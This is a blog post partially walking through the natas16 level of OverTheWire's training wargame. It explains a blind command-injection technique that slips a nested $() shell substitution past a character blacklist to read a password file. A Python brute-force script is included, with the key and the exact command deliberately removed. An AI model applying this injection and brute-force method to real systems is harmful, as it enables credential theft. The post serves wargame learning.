Today, out of nowhere, I suddenly started seeing a huge number of page views to my post on scraping HTML comments with Python. After digging around, I figured out it was coming from some mentions I made regarding using part of that code for solving some of the challenges in the natas wargame from OverTheWire.org.
I normally don’t write about wargame solutions, since the fun is in working out the solution for yourself, but I thought I’d share some more Python code I came up with for natas16 because I’ve seen a bunch of people doing some really nutty things trying to get through it. Here’s my solution – but I warn you I’ve stripped out the keys (so you’ll have to work your way to 16 on your own) and I’ve intentionally made this less than a step-by-step walk through.
natas16 starts looking pretty sparse:
If you’ve worked your way through, you’ll see this is pretty similar to the shell code injection challenge you encountered on the way. A quick look at the provided source shows that our imaginary adversary got wise to our injection and has tried to prevent similar exploits in the future:
So here we can see that our submitted key is checked for ;, |, &, `,’ and ” globally via a regular expression and gets tossed out if any are found. That rules out a direct shell injection attack like we used before, right? Well..
A big part of cracking this one relies on the contents of dictionary.txt. A bit of searching through the page shows us that it appears to contain an entry for every letter and every number from 0 to 9. We know from the rules of the game that our target password file is located in /etc/natas_webpass/natas17, but we can’t just inject a “cat” statement into the grep command because of rights issues..
Here comes the fun part. What if we could use results of the parent grep command to signal when we’ve found what we’re looking for in a nested shell command with access to /etc/natas_webpass/natas17? Something like.. nah, you’ll have to figure that part out on your own.
When you do, you’ll probably discover that it would take a decent amount of time to try each and every letter for each and every position *coughHINTcough*. It would be pretty nice if we could whip up a Python script to do the hard work for us. It’s worth mentioning that the way I detected a success was by the lack of results from a search. Here’s my script:
import requests
import string
auth = ("natas16", "Key_To_natas16")
url = "http://natas16.natas.labs.overthewire.org/index.php"
s = requests.session(auth=auth)
data = {}
characterPool = string.ascii_letters + string.digits
submission = '$(magicCommand /etc/natas_webpass/natas17)'
password = ""
for i in range(1, 32):
for c in characterPool:
data["needle"] = submission % (password + c)
r = s.post(url, data, auth=auth).content
if len(r) == 473:
password += c
print "Col: ",i," Pass: ", password
break
print "Complete: ",password
Obviously I’ve removed the key to natas16 which you can retreive from natas16.. and I’ve substituted the “magicCommand” for my hypothetical string.. but if you look at the structure of this script it should give you some strong indications about how to go about solving natas16 (without dropping the solution right in your lap turnkey) If you can’t figure it out from the above, or if you can’t even make it to 16, shoot me an email or message me on Twitter and I’d be happy to try to give you a few more hints.
